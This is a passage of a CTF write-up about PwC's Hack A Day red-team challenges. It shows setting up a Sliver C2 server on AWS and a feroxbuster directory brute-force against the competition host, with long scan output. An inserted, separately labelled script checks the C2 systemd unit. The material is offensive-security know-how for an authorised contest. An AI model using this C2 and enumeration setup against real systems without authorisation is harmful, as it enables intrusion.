jigsaw@jigsaw

Taking On PWC's Active Directory Challenges Again


Last updated 6 months ago

I'm back from another round of PwC's Capture the Flag (CTF) competition, held on November 11 as part of PwC Hong Kong's 8th Annual Hack A Day. Having played last year too, it was good to see familiar faces, new challenges, and more current tooling. This year was my redemption arc for last year's mistakes on the Active Directory challenges. For context, jeopardy-style CTFs rarely include Boot2Root challenges, and Active Directory challenges are rarer still.

Reflecting on last year's Active Directory challenges, what went wrong? Unlike TryHackMe, Hack The Box or Proving Grounds, the CTF did not provide a VPN into the target network: the IP address the organisers gave us was a public one. For the attacker that means any reverse shell from the target has to reach a host on the internet, so you either port-forward several ports through your home router or tunnel them through something like ngrok, both of which take a lot of configuration and are easy to get wrong under time pressure. So this year I set up a Sliver C2 server in the cloud ahead of time, which also gave me a chance to learn Sliver before taking the OSEP certification.

C2 Preparation


On AWS I launched a t2.medium EC2 instance running Kali Linux. Once it was up, I ran the following to install the tooling:

sudo apt update && sudo apt -y full-upgrade
sudo apt install kali-linux-default
sudo apt install sliver autorecon fish
chsh -s $(which fish)
sudo chsh -s $(which fish)

I configured Sliver as a service by putting the following contents into /etc/systemd/system/sliver.service

[Unit]
Description=Sliver
After=network.target
StartLimitIntervalSec=0

[Service]
Type=simple
Restart=on-failure
RestartSec=3
User=kali
ExecStart=/usr/bin/sliver-server daemon

[Install]
WantedBy=multi-user.target

I then restricted the unit file's permissions. Note that chmod does not enable the service; it only limits who can read the file:

sudo chmod 600 /etc/systemd/system/sliver.service

The service is enabled (so it comes back after a reboot of the instance) and started with systemctl:

sudo systemctl enable sliver
sudo systemctl start sliver

Once the daemon was up, I opened the interactive sliver-server console to install the armory extensions and create an operator:

armory install all
new-operator --name jigsaw --lhost <EC2_IP_ADDRESS>

new-operator writes a client configuration file containing the operator's mTLS certificate and private key, so it must be treated as a secret: anyone holding it can drive the C2. I copied it to my own machine and imported it into sliver-client with:

sliver-client import <CONFIGURATION_FILE>
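The steps above (unit file, permissions, enable, start) can be scripted and checked rather than done by hand. The following is an added example and not part of the original writeup or of Sliver's own install script. It renders the same unit as above, writes it with mode 600 in one step, and then verifies the properties that matter on a public host: the file is not world-readable, the daemon does not run as root, ExecStart uses daemon mode, and an [Install] target exists so that systemctl enable actually does something. It adds one directive the writeup's unit lacks: AmbientCapabilities=CAP_NET_BIND_SERVICE, because a User=kali daemon cannot otherwise bind HTTP/HTTPS listeners on ports 80 and 443. The service user, binary path and destination directory are assumptions (defaults: kali, /usr/bin/sliver-server, a temp directory) so the script runs offline without touching /etc.

```shell
#!/bin/sh
# Added example, not part of the original writeup: render, install and check a
# systemd unit for a Sliver C2 daemon running as an unprivileged user on a
# public cloud host. Assumed: the service user (default "kali") and the path
# to sliver-server (default /usr/bin/sliver-server); the destination is a
# temp directory here so the script runs offline without touching /etc.

render_sliver_unit() {
  # $1 = service user, $2 = path to the sliver-server binary
  cat <<EOF
[Unit]
Description=Sliver
After=network.target
StartLimitIntervalSec=0

[Service]
Type=simple
Restart=on-failure
RestartSec=3
User=$1
# An unprivileged user cannot bind listeners on 80/443 (http/https stagers)
# without this capability; granting it is narrower than running as root.
AmbientCapabilities=CAP_NET_BIND_SERVICE
ExecStart=$2 daemon

[Install]
WantedBy=multi-user.target
EOF
}

install_sliver_unit() {
  # $1 = destination path, $2 = service user, $3 = sliver-server path
  # umask 077 creates the file as mode 600 from the start, so there is no
  # window in which the unit is readable by other users on the host.
  ( umask 077; render_sliver_unit "$2" "$3" > "$1" )
}

verify_sliver_unit() {
  # $1 = unit file. Returns 0 only when every check passes; prints each failure.
  f=$1; rc=0
  [ "$(ls -ld "$f" | cut -c1-10)" = "-rw-------" ] \
    || { echo "FAIL: $f is not mode 600"; rc=1; }
  if ! grep -q '^User=' "$f" || grep -q '^User=root$' "$f"; then
    echo "FAIL: unit runs as root (no least privilege)"; rc=1
  fi
  grep -q '^ExecStart=.* daemon$' "$f" \
    || { echo "FAIL: ExecStart does not start sliver-server in daemon mode"; rc=1; }
  grep -q '^WantedBy=multi-user.target$' "$f" \
    || { echo "FAIL: no [Install] target; 'systemctl enable' would do nothing"; rc=1; }
  return $rc
}

# Stand-alone run: write into a temp dir and check it. On the real host the
# destination is /etc/systemd/system/sliver.service, followed by
# 'systemctl daemon-reload', 'systemctl enable sliver', 'systemctl start sliver'.
DEST="${DEST:-$(mktemp -d)/sliver.service}"
install_sliver_unit "$DEST" "${SVC_USER:-kali}" "${SLIVER_BIN:-/usr/bin/sliver-server}"
verify_sliver_unit "$DEST" && echo "unit OK: $DEST"
```

Run it as-is to see the checks pass on the rendered unit, or point verify_sliver_unit at an existing /etc/systemd/system/sliver.service to audit one written by hand. The daemon's operator port (31337 by default) and SSH should additionally be limited to your own source IP in the instance's security group; the unit file cannot enforce that.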

Easy Initial access - 1


Category : Red Team

Points : 50

Two easily accessible external-facing services are there for obtaining initial access! If you have flags from external servers, attempt to input them into either Easy Initial Access - 1 or Easy Initial Access - 2. Both entry points offer identical information to assist you in hacking into the corporate internal network!

Flag format for red team: Hack{[sha256string]}

I started by enumerating a web service on the given hostname. I assumed one existed rather than confirming it with a port scan first; that worked here, but it is a shortcut, not a method, and a full port scan should come before directory brute-forcing.

feroxbuster --url http://redteam-w324duut.darklabhackaday.com -d 4 -t 100 -o feroxbuster.txt -x asp,aspx,html,php,xml,json,txt,log,sql,db,bak,sqlite,zip,pdf -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -C 404,400

These were the results of the scan:

302      GET        0l        0w        0c http://redteam-w324duut.darklabhackaday.com/ => http://redteam-w324duut.darklabhackaday.com/dashboard/
301      GET        9l       30w      382c http://redteam-w324duut.darklabhackaday.com/img => http://redteam-w324duut.darklabhackaday.com/img/
200      GET        3l       16w     1549c http://redteam-w324duut.darklabhackaday.com/img/module_table_bottom.png
200      GET        5l        9w      694c http://redteam-w324duut.darklabhackaday.com/img/module_table_top.png
302      GET        0l        0w        0c http://redteam-w324duut.darklabhackaday.com/index.php => http://redteam-w324duut.darklabhackaday.com/dashboard/
301      GET        9l       30w      386c http://redteam-w324duut.darklabhackaday.com/uploads => http://redteam-w324duut.darklabhackaday.com/uploads/
200      GET       16l       32w      406c http://redteam-w324duut.darklabhackaday.com/uploads/upload.php
302      GET        0l        0w        0c http://redteam-w324duut.darklabhackaday.com/Index.php => http://redteam-w324duut.darklabhackaday.com/dashboard/
503      GET       11l       44w      425c http://redteam-w324duut.darklabhackaday.com/examples
403      GET       11l       47w      444c http://redteam-w324duut.darklabhackaday.com/licenses
200      GET       17l       21w      177c http://redteam-w324duut.darklabhackaday.com/bitnami.css
200      GET       79l      250w     3607c http://redteam-w324duut.darklabhackaday.com/applications.html
403      GET       11l       47w      444c http://redteam-w324duut.darklabhackaday.com/phpmyadmin
200      GET      130l      436w     5187c http://redteam-w324duut.darklabhackaday.com/dashboard/index.html
200      GET      123l      377w     5680c http://redteam-w324duut.darklabhackaday.com/dashboard/howto.html
200      GET        7l       57w     2442c http://redteam-w324duut.darklabhackaday.com/dashboard/images/fastly-logo.png
200      GET        8l       76w     4088c http://redteam-w324duut.darklabhackaday.com/dashboard/images/fastly-logo@2x.png
200      GET      516l     3755w    31519c http://redteam-w324duut.darklabhackaday.com/dashboard/faq.html
200      GET      376l      890w     6876c http://redteam-w324duut.darklabhackaday.com/dashboard/stylesheets/normalize.css
200      GET      723l     5244w    39391c http://redteam-w324duut.darklabhackaday.com/dashboard/stylesheets/asciidoctor.css
200      GET     9211l    36081w   406998c http://redteam-w324duut.darklabhackaday.com/dashboard/stylesheets/all.css
200      GET       33l      214w    12599c http://redteam-w324duut.darklabhackaday.com/dashboard/images/social-icons-large.png
200      GET       50l       99w     5427c http://redteam-w324duut.darklabhackaday.com/dashboard/images/xampp-logo.svg
200      GET       19l      154w    11138c http://redteam-w324duut.darklabhackaday.com/dashboard/images/social-icons-large@2x.png
200      GET       16l      155w    10943c http://redteam-w324duut.darklabhackaday.com/dashboard/images/sourceforge-logo.png
200      GET       27l      253w    19113c http://redteam-w324duut.darklabhackaday.com/dashboard/images/sourceforge-logo@2x.png
200      GET        5l       47w     2036c http://redteam-w324duut.darklabhackaday.com/dashboard/images/appleVM-logo.png
200      GET        7l       76w     3900c http://redteam-w324duut.darklabhackaday.com/dashboard/images/favicon.png
200      GET       10l       64w     2711c http://redteam-w324duut.darklabhackaday.com/dashboard/images/linux-logo.png
200      GET       11l       79w     4243c http://redteam-w324duut.darklabhackaday.com/dashboard/images/background.png
200      GET        6l       66w     2819c http://redteam-w324duut.darklabhackaday.com/dashboard/images/windows-logo.png
200      GET       17l      132w     9021c http://redteam-w324duut.darklabhackaday.com/dashboard/images/social-icons@2x.png
200      GET       13l       93w     5327c http://redteam-w324duut.darklabhackaday.com/dashboard/images/social-icons.png
200      GET       15l       93w     6731c http://redteam-w324duut.darklabhackaday.com/dashboard/images/pdf-icon.png
200      GET        5l       47w     2036c http://redteam-w324duut.darklabhackaday.com/dashboard/images/apple-logo.png
200      GET       37l      267w    20117c http://redteam-w324duut.darklabhackaday.com/dashboard/images/stack-icons@2x.png
200      GET       40l      202w    14635c http://redteam-w324duut.darklabhackaday.com/dashboard/images/xampp-newsletter-logo.png
200      GET       37l      265w    20115c http://redteam-w324duut.darklabhackaday.com/dashboard/images/stack-icons.png
200      GET       71l      573w    44633c http://redteam-w324duut.darklabhackaday.com/dashboard/images/middleman.png
200      GET       85l      555w    39860c http://redteam-w324duut.darklabhackaday.com/dashboard/images/bitnami-xampp.png
200      GET       53l      392w    31074c http://redteam-w324duut.darklabhackaday.com/dashboard/images/addons-video-thumb.png
200      GET      116l      679w    55358c http://redteam-w324duut.darklabhackaday.com/dashboard/images/xampp-cloud@2x.png
200      GET       63l      321w    29058c http://redteam-w324duut.darklabhackaday.com/dashboard/images/xampp-cloud.png
200      GET      415l      982w    45676c http://redteam-w324duut.darklabhackaday.com/dashboard/images/blog/xampp-vm-cakephp-11.png
200      GET        3l       18w      953c http://redteam-w324duut.darklabhackaday.com/dashboard/images/flags/fr.png
200      GET      247l      765w    41974c http://redteam-w324duut.darklabhackaday.com/dashboard/images/blog/xampp-vm-php-output.png
200      GET      357l     1795w   138791c http://redteam-w324duut.darklabhackaday.com/dashboard/images/twitter-bird.png
200      GET        4l       20w      847c http://redteam-w324duut.darklabhackaday.com/dashboard/images/flags/cn.png
200      GET        3l       23w      860c http://redteam-w324duut.darklabhackaday.com/dashboard/images/flags/ro.png
200      GET        4l       20w      847c http://redteam-w324duut.darklabhackaday.com/dashboard/images/flags/zh_cn.png
200      GET        4l       20w      704c http://redteam-w324duut.darklabhackaday.com/dashboard/images/flags/ru.png
200      GET        3l       13w     1665c http://redteam-w324duut.darklabhackaday.com/dashboard/images/stamps/stamp-80x15.gif
200      GET        5l       25w     1570c http://redteam-w324duut.darklabhackaday.com/dashboard/images/stamps/stamp-88x31.gif
200      GET      293l      799w    40142c http://redteam-w324duut.darklabhackaday.com/dashboard/images/blog/xampp-vm-cakephp-3.png
200      GET     9211l    36081w   407110c http://redteam-w324duut.darklabhackaday.com/dashboard/stylesheets/all-rtl.css
200      GET      293l     1440w    75826c http://redteam-w324duut.darklabhackaday.com/dashboard/images/blog/xampp-vm-cakephp-4.png
200      GET      230l     1035w   160961c http://redteam-w324duut.darklabhackaday.com/dashboard/images/screenshots/xampp-macosx-stack-manager-network.jpg
200      GET        3l       13w     1211c http://redteam-w324duut.darklabhackaday.com/dashboard/images/flags/pt_br.png
200      GET        5l       23w      700c http://redteam-w324duut.darklabhackaday.com/dashboard/images/flags/hu.png
200      GET        5l       21w      744c http://redteam-w324duut.darklabhackaday.com/dashboard/images/flags/jp.png
200      GET       18l       77w     3411c http://redteam-w324duut.darklabhackaday.com/dashboard/images/stamps/stamp-173x38.gif
200      GET        4l       19w      985c http://redteam-w324duut.darklabhackaday.com/dashboard/images/flags/de.png
200      GET        3l       18w      795c http://redteam-w324duut.darklabhackaday.com/dashboard/images/flags/es.png
200      GET        3l       16w     1056c http://redteam-w324duut.darklabhackaday.com/dashboard/images/flags/ur.png
200      GET        4l       19w      887c http://redteam-w324duut.darklabhackaday.com/dashboard/images/flags/tr.png
200      GET        3l       20w     1021c http://redteam-w324duut.darklabhackaday.com/dashboard/images/flags/pt.png
200      GET        4l       19w      623c http://redteam-w324duut.darklabhackaday.com/dashboard/images/flags/pl.png
200      GET       87l      511w    34878c http://redteam-w324duut.darklabhackaday.com/dashboard/images/bitnami-xampp/image2.png
200      GET      306l     1208w    87718c http://redteam-w324duut.darklabhackaday.com/dashboard/images/blog/xampp-vm-volumes.png
200      GET       82l      353w    27184c http://redteam-w324duut.darklabhackaday.com/dashboard/images/team/beltran-rueda.png
200      GET        3l       20w      780c http://redteam-w324duut.darklabhackaday.com/dashboard/images/flags/zh_tw.png
200      GET        4l       18w     1088c http://redteam-w324duut.darklabhackaday.com/dashboard/images/flags/en.png
200      GET        4l       24w      714c http://redteam-w324duut.darklabhackaday.com/dashboard/images/flags/it.png
200      GET      200l      516w    30995c http://redteam-w324duut.darklabhackaday.com/dashboard/images/bitnami-xampp/image6.png
200      GET       53l      283w    18022c http://redteam-w324duut.darklabhackaday.com/dashboard/images/team/paul-hinz.jpg
200      GET      238l      900w    46506c http://redteam-w324duut.darklabhackaday.com/dashboard/images/blog/xampp-vm-cakephp-2.png
200      GET       82l      513w    37591c http://redteam-w324duut.darklabhackaday.com/dashboard/images/bitnami-xampp/image1.png
200      GET       71l      429w    32552c http://redteam-w324duut.darklabhackaday.com/dashboard/images/team/kay-vogelgesang.jpg
200      GET      118l      462w    38225c http://redteam-w324duut.darklabhackaday.com/dashboard/images/team/kai-seidler.jpg
200      GET       59l      418w    30054c http://redteam-w324duut.darklabhackaday.com/dashboard/images/team/daniel-lopez.png
200      GET      361l     1179w    63156c http://redteam-w324duut.darklabhackaday.com/dashboard/images/bitnami-xampp/image7.png
200      GET      870l     4669w    77125c http://redteam-w324duut.darklabhackaday.com/dashboard/phpinfo.php
200      GET       79l      250w     3607c http://redteam-w324duut.darklabhackaday.com/Applications.html
200      GET       57l      329w    30430c http://redteam-w324duut.darklabhackaday.com/dashboard/images/bitnami-xampp/image4.png
200      GET      190l      939w   149693c http://redteam-w324duut.darklabhackaday.com/dashboard/images/screenshots/xampp-macosx-stack-manager-services.jpg
200      GET      646l     2898w   150902c http://redteam-w324duut.darklabhackaday.com/dashboard/images/blog/xampp-vm-cakephp-7.png
200      GET      662l     2987w   200091c http://redteam-w324duut.darklabhackaday.com/dashboard/images/bitnami-xampp/image3.png
200      GET      391l      736w    32055c http://redteam-w324duut.darklabhackaday.com/dashboard/images/blog/xampp-vm-cakephp-10.png
200      GET      192l      819w   111554c http://redteam-w324duut.darklabhackaday.com/dashboard/images/screenshots/xampp-macosx-launch-credentials.jpg
200      GET      317l     1398w   102812c http://redteam-w324duut.darklabhackaday.com/dashboard/images/blog/xampp-vm-network.png
200      GET      269l      825w    45058c http://redteam-w324duut.darklabhackaday.com/dashboard/images/blog/xampp-vm-cakephp-1.png
200      GET      453l     2324w   158417c http://redteam-w324duut.darklabhackaday.com/dashboard/images/bitnami-xampp/image5.png
200      GET      213l      962w   121742c http://redteam-w324duut.darklabhackaday.com/dashboard/images/screenshots/xampp-macosx-download-installer.jpg
200      GET      267l      982w    70802c http://redteam-w324duut.darklabhackaday.com/dashboard/images/blog/xampp-vm-manager.png
200      GET       69l      596w    45129c http://redteam-w324duut.darklabhackaday.com/dashboard/images/blog/download-xampp-vm.png
200      GET      261l     1347w   101068c http://redteam-w324duut.darklabhackaday.com/dashboard/images/blog/xampp-vm-general.png
200      GET      198l      879w   148586c http://redteam-w324duut.darklabhackaday.com/dashboard/images/screenshots/xampp-macosx-stack-manager.jpg
200      GET     1085l     2446w    95994c http://redteam-w324duut.darklabhackaday.com/dashboard/images/blog/xampp-vm-cakephp-8.png
200      GET      213l      796w   131162c http://redteam-w324duut.darklabhackaday.com/dashboard/images/screenshots/xampp-macosx-stack-manager-volumes.jpg
301      GET        9l       30w      395c http://redteam-w324duut.darklabhackaday.com/dashboard/images => http://redteam-w324duut.darklabhackaday.com/dashboard/images/
200      GET      388l     2189w   119541c http://redteam-w324duut.darklabhackaday.com/dashboard/images/blog/xampp-vm-cakephp-9.png
200      GET      209l      978w   166567c http://redteam-w324duut.darklabhackaday.com/dashboard/images/screenshots/xampp-macosx-stack-manager-general.jpg
200      GET      484l     2227w   119307c http://redteam-w324duut.darklabhackaday.com/dashboard/images/blog/xampp-vm-cakephp-6.png
200      GET      732l     2220w   112133c http://redteam-w324duut.darklabhackaday.com/dashboard/images/blog/xampp-vm-cakephp-5.png
200      GET      385l     1620w   180620c http://redteam-w324duut.darklabhackaday.com/dashboard/images/screenshots/xampp-macosx-run-installer.jpg
301      GET        9l       30w      393c http://redteam-w324duut.darklabhackaday.com/dashboard/docs => http://redteam-w324duut.darklabhackaday.com/dashboard/docs/
200      GET      514l     2774w   217526c http://redteam-w324duut.darklabhackaday.com/dashboard/images/blog/xampp-vm-tray.png
200      GET        9l       24w      205c http://redteam-w324duut.darklabhackaday.com/dashboard/docs/use-different-php-version.pdfmarks
200      GET        9l       21w      194c http://redteam-w324duut.darklabhackaday.com/dashboard/docs/auto-start-xampp.pdfmarks
200      GET      415l     3307w   178294c http://redteam-w324duut.darklabhackaday.com/dashboard/images/blog/xampp-vm-php-finder.png
200      GET        9l       22w      201c http://redteam-w324duut.darklabhackaday.com/dashboard/docs/configure-vhosts.pdfmarks
200      GET        9l       26w      214c http://redteam-w324duut.darklabhackaday.com/dashboard/docs/create-framework-project-zf1.pdfmarks
200      GET     1733l     4717w    63573c http://redteam-w324duut.darklabhackaday.com/dashboard/docs/use-sqlite.pdf
200      GET        9l       24w      212c http://redteam-w324duut.darklabhackaday.com/dashboard/docs/access-phpmyadmin-remotely.pdfmarks
200      GET      141l      400w     5035c http://redteam-w324duut.darklabhackaday.com/dashboard/docs/increase-php-file-upload-limit.html
200      GET        9l       22w      213c http://redteam-w324duut.darklabhackaday.com/dashboard/docs/configure-wildcard-subdomains.pdfmarks
200      GET      491l     1265w     8252c http://redteam-w324duut.darklabhackaday.com/dashboard/docs/change-mysql-temp-dir.pdf
200      GET      258l      880w     8922c http://redteam-w324duut.darklabhackaday.com/dashboard/docs/transfer-files-ftp.html
200      GET      259l     1111w    10703c http://redteam-w324duut.darklabhackaday.com/dashboard/docs/send-mail.html
200      GET     1241l     3311w    46923c http://redteam-w324duut.darklabhackaday.com/dashboard/docs/use-php-fcgi.pdf
200      GET      455l     1433w    50421c http://redteam-w324duut.darklabhackaday.com/dashboard/docs/auto-start-xampp.pdf
200      GET     1118l     3102w    65875c http://redteam-w324duut.darklabhackaday.com/dashboard/docs/use-different-php-version.pdf
200      GET      996l     7189w   909082c http://redteam-w324duut.darklabhackaday.com/dashboard/images/screenshots/xampp-windows-start.jpg
200      GET      347l     1465w    14053c http://redteam-w324duut.darklabhackaday.com/dashboard/docs/backup-restore-mysql.html
200      GET      950l     4698w   417860c http://redteam-w324duut.darklabhackaday.com/dashboard/images/blog/heartbleed-affected-osx.png
200      GET     2220l     6600w   143895c http://redteam-w324duut.darklabhackaday.com/dashboard/docs/configure-wildcard-subdomains.pdf
200      GET      509l     2484w   251673c http://redteam-w324duut.darklabhackaday.com/dashboard/images/screenshots/xampp-macosx-wordpress.jpg
200      GET      440l     2399w   256922c http://redteam-w324duut.darklabhackaday.com/dashboard/images/blog/heartbleed-affected.png
200      GET      356l     2370w   238837c http://redteam-w324duut.darklabhackaday.com/dashboard/images/blog/heartbleed-fixed.png
200      GET     1071l     7077w   888496c http://redteam-w324duut.darklabhackaday.com/dashboard/images/screenshots/xampp-linux-start.jpg
301      GET        9l       30w      395c http://redteam-w324duut.darklabhackaday.com/dashboard/Images => http://redteam-w324duut.darklabhackaday.com/dashboard/Images/
200      GET      428l     5896w   332579c http://redteam-w324duut.darklabhackaday.com/dashboard/images/blog/phpinfo-section-2.png
200      GET      403l     2814w   283442c http://redteam-w324duut.darklabhackaday.com/dashboard/images/blog/phpinfo-section-1.png
200      GET      990l     7221w   899476c http://redteam-w324duut.darklabhackaday.com/dashboard/images/screenshots/xampp-macosx-start.jpg
200      GET        8l       76w     4088c http://redteam-w324duut.darklabhackaday.com/dashboard/Images/fastly-logo@2x.png
301      GET        9l       30w      391c http://redteam-w324duut.darklabhackaday.com/dashboard/de => http://redteam-w324duut.darklabhackaday.com/dashboard/de/
200      GET      516l     3755w    31519c http://redteam-w324duut.darklabhackaday.com/dashboard/FAQ.html
301      GET        9l       30w      391c http://redteam-w324duut.darklabhackaday.com/dashboard/es => http://redteam-w324duut.darklabhackaday.com/dashboard/es/
301      GET        9l       30w      391c http://redteam-w324duut.darklabhackaday.com/dashboard/pl => http://redteam-w324duut.darklabhackaday.com/dashboard/pl/
200      GET      130l      436w     5187c http://redteam-w324duut.darklabhackaday.com/dashboard/
301      GET        9l       30w      391c http://redteam-w324duut.darklabhackaday.com/dashboard/tr => http://redteam-w324duut.darklabhackaday.com/dashboard/tr/
301      GET        9l       30w      388c http://redteam-w324duut.darklabhackaday.com/dashboard => http://redteam-w324duut.darklabhackaday.com/dashboard/
301      GET        9l       30w      391c http://redteam-w324duut.darklabhackaday.com/dashboard/fr => http://redteam-w324duut.darklabhackaday.com/dashboard/fr/
200      GET      228l      890w     9132c http://redteam-w324duut.darklabhackaday.com/dashboard/docs/configure-use-tomcat.html
200      GET      202l      797w     8232c http://redteam-w324duut.darklabhackaday.com/dashboard/docs/activate-use-xdebug.html
200      GET      716l     2108w    53180c http://redteam-w324duut.darklabhackaday.com/dashboard/docs/access-phpmyadmin-remotely.pdf
200      GET        9l       24w      220c http://redteam-w324duut.darklabhackaday.com/dashboard/docs/backup-restore-mysql.pdfmarks
200      GET      255l      903w     9661c http://redteam-w324duut.darklabhackaday.com/dashboard/docs/create-framework-project-zf2.html
200      GET        9l       24w      215c http://redteam-w324duut.darklabhackaday.com/dashboard/docs/reset-mysql-password.pdfmarks
200      GET        9l       24w      209c http://redteam-w324duut.darklabhackaday.com/dashboard/docs/configure-use-tomcat.pdfmarks
200      GET      232l      955w     9150c http://redteam-w324duut.darklabhackaday.com/dashboard/docs/use-sqlite.html
200      GET      138l      402w     4954c http://redteam-w324duut.darklabhackaday.com/dashboard/docs/auto-start-xampp.html
200      GET        9l       23w      196c http://redteam-w324duut.darklabhackaday.com/dashboard/docs/use-sqlite.pdfmarks
200      GET        9l       23w      201c http://redteam-w324duut.darklabhackaday.com/dashboard/docs/activate-use-xdebug.pdfmarks
200      GET      247l     1024w    10426c http://redteam-w324duut.darklabhackaday.com/dashboard/docs/configure-wildcard-subdomains.html
200      GET     1913l     5341w    94836c http://redteam-w324duut.darklabhackaday.com/dashboard/docs/create-framework-project-zf1.pdf
200      GET        9l       23w      199c http://redteam-w324duut.darklabhackaday.com/dashboard/docs/use-php-fcgi.pdfmarks
200      GET        9l       26w      214c http://redteam-w324duut.darklabhackaday.com/dashboard/docs/create-framework-project-zf2.pdfmarks
200      GET      205l      588w     6848c http://redteam-w324duut.darklabhackaday.com/dashboard/docs/use-php-fcgi.html
200      GET        9l       25w      220c http://redteam-w324duut.darklabhackaday.com/dashboard/docs/change-mysql-temp-dir.pdfmarks
200      GET      182l      556w     6476c http://redteam-w324duut.darklabhackaday.com/dashboard/docs/reset-mysql-password.html
200      GET     2007l     7708w   329917c http://redteam-w324duut.darklabhackaday.com/dashboard/docs/transfer-files-ftp.pdf
200      GET        9l       24w      209c http://redteam-w324duut.darklabhackaday.com/dashboard/docs/deploy-git-app.pdfmarks
200      GET        9l       23w      214c http://redteam-w324duut.darklabhackaday.com/dashboard/docs/troubleshoot-apache.pdfmarks
200      GET     2063l     6324w   157912c http://redteam-w324duut.darklabhackaday.com/dashboard/docs/configure-vhosts.pdf
200      GET      404l     1469w    14538c http://redteam-w324duut.darklabhackaday.com/dashboard/docs/troubleshoot-apache.html
200      GET      185l      646w     6965c http://redteam-w324duut.darklabhackaday.com/dashboard/docs/use-different-php-version.html
200      GET        9l       22w      198c http://redteam-w324duut.darklabhackaday.com/dashboard/docs/transfer-files-ftp.pdfmarks
200      GET        9l       25w      212c http://redteam-w324duut.darklabhackaday.com/dashboard/docs/increase-php-file-upload-limit.pdfmarks
200      GET        9l       23w      196c http://redteam-w324duut.darklabhackaday.com/dashboard/docs/send-mail.pdfmarks
200      GET      157l      444w     5569c http://redteam-w324duut.darklabhackaday.com/dashboard/docs/access-phpmyadmin-remotely.html
200      GET      233l      790w     8615c http://redteam-w324duut.darklabhackaday.com/dashboard/docs/create-framework-project-zf1.html
200      GET     2497l     7555w   223960c http://redteam-w324duut.darklabhackaday.com/dashboard/docs/create-framework-project-zf2.pdf
200      GET       50l       99w     5427c http://redteam-w324duut.darklabhackaday.com/dashboard/Images/xampp-logo.svg
200      GET     1985l     7213w   358821c http://redteam-w324duut.darklabhackaday.com/dashboard/docs/configure-use-tomcat.pdf
200      GET      244l     1024w    10172c http://redteam-w324duut.darklabhackaday.com/dashboard/docs/configure-vhosts.html
200      GET      135l      389w     4916c http://redteam-w324duut.darklabhackaday.com/dashboard/docs/change-mysql-temp-dir.html
200      GET      357l     1795w   138791c http://redteam-w324duut.darklabhackaday.com/dashboard/Images/twitter-bird.png
200      GET       33l      214w    12599c http://redteam-w324duut.darklabhackaday.com/dashboard/Images/social-icons-large.png
200      GET       27l      253w    19113c http://redteam-w324duut.darklabhackaday.com/dashboard/Images/sourceforge-logo@2x.png
200      GET     1993l     5633w   186879c http://redteam-w324duut.darklabhackaday.com/dashboard/docs/activate-use-xdebug.pdf
200      GET      577l     1455w     9437c http://redteam-w324duut.darklabhackaday.com/dashboard/docs/increase-php-file-upload-limit.pdf
200      GET       15l       93w     6731c http://redteam-w324duut.darklabhackaday.com/dashboard/Images/pdf-icon.png
200      GET     2202l     6080w   102037c http://redteam-w324duut.darklabhackaday.com/dashboard/docs/send-mail.pdf
200      GET      194l      864w     8649c http://redteam-w324duut.darklabhackaday.com/dashboard/docs/deploy-git-app.html
200      GET      130l      436w     5187c http://redteam-w324duut.darklabhackaday.com/dashboard/Index.html
200      GET       40l      202w    14635c http://redteam-w324duut.darklabhackaday.com/dashboard/Images/xampp-newsletter-logo.png
200      GET     1694l     5251w   203968c http://redteam-w324duut.darklabhackaday.com/dashboard/docs/deploy-git-app.pdf
200      GET       53l      283w    18022c http://redteam-w324duut.darklabhackaday.com/dashboard/Images/team/paul-hinz.jpg
200      GET     1007l     3248w    96850c http://redteam-w324duut.darklabhackaday.com/dashboard/docs/reset-mysql-password.pdf
200      GET      118l      462w    38225c http://redteam-w324duut.darklabhackaday.com/dashboard/Images/team/kai-seidler.jpg
200      GET        5l       21w      744c http://redteam-w324duut.darklabhackaday.com/dashboard/Images/flags/jp.png
200      GET        4l       20w      847c http://redteam-w324duut.darklabhackaday.com/dashboard/Images/flags/cn.png
200      GET        3l       18w      795c http://redteam-w324duut.darklabhackaday.com/dashboard/Images/flags/es.png
200      GET        4l       20w      847c http://redteam-w324duut.darklabhackaday.com/dashboard/Images/flags/zh_cn.png
200      GET        3l       18w      953c http://redteam-w324duut.darklabhackaday.com/dashboard/Images/flags/fr.png
200      GET        4l       24w      714c http://redteam-w324duut.darklabhackaday.com/dashboard/Images/flags/it.png
200      GET        4l       18w     1088c http://redteam-w324duut.darklabhackaday.com/dashboard/Images/flags/en.png
200      GET        4l       19w      887c http://redteam-w324duut.darklabhackaday.com/dashboard/Images/flags/tr.png
200      GET        5l       23w      700c http://redteam-w324duut.darklabhackaday.com/dashboard/Images/flags/hu.png
200      GET       71l      573w    44633c http://redteam-w324duut.darklabhackaday.com/dashboard/Images/middleman.png
200      GET       53l      392w    31074c http://redteam-w324duut.darklabhackaday.com/dashboard/Images/addons-video-thumb.png
200      GET        6l       66w     2819c http://redteam-w324duut.darklabhackaday.com/dashboard/Images/windows-logo.png
200      GET       85l      555w    39860c http://redteam-w324duut.darklabhackaday.com/dashboard/Images/bitnami-xampp.png
200      GET        5l       47w     2036c http://redteam-w324duut.darklabhackaday.com/dashboard/Images/apple-logo.png
200      GET      116l      679w    55358c http://redteam-w324duut.darklabhackaday.com/dashboard/Images/xampp-cloud@2x.png
200      GET        5l       47w     2036c http://redteam-w324duut.darklabhackaday.com/dashboard/Images/appleVM-logo.png
200      GET     3708l    12696w   520057c http://redteam-w324duut.darklabhackaday.com/dashboard/docs/backup-restore-mysql.pdf
200      GET        3l       13w     1211c http://redteam-w324duut.darklabhackaday.com/dashboard/Images/flags/pt_br.png
200      GET       37l      267w    20117c http://redteam-w324duut.darklabhackaday.com/dashboard/Images/stack-icons@2x.png
200      GET       16l      155w    10943c http://redteam-w324duut.darklabhackaday.com/dashboard/Images/sourceforge-logo.png
200      GET       13l       93w     5327c http://redteam-w324duut.darklabhackaday.com/dashboard/Images/social-icons.png
200      GET      293l     1440w    75826c http://redteam-w324duut.darklabhackaday.com/dashboard/Images/blog/xampp-vm-cakephp-4.png
200      GET        7l       76w     3900c http://redteam-w324duut.darklabhackaday.com/dashboard/Images/favicon.png
200      GET      247l      765w    41974c http://redteam-w324duut.darklabhackaday.com/dashboard/Images/blog/xampp-vm-php-output.png
200      GET      269l      825w    45058c http://redteam-w324duut.darklabhackaday.com/dashboard/Images/blog/xampp-vm-cakephp-1.png
200      GET     4360l    16918w   859090c http://redteam-w324duut.darklabhackaday.com/dashboard/docs/troubleshoot-apache.pdf
200      GET      293l      799w    40142c http://redteam-w324duut.darklabhackaday.com/dashboard/Images/blog/xampp-vm-cakephp-3.png
200      GET      238l      900w    46506c http://redteam-w324duut.darklabhackaday.com/dashboard/Images/blog/xampp-vm-cakephp-2.png
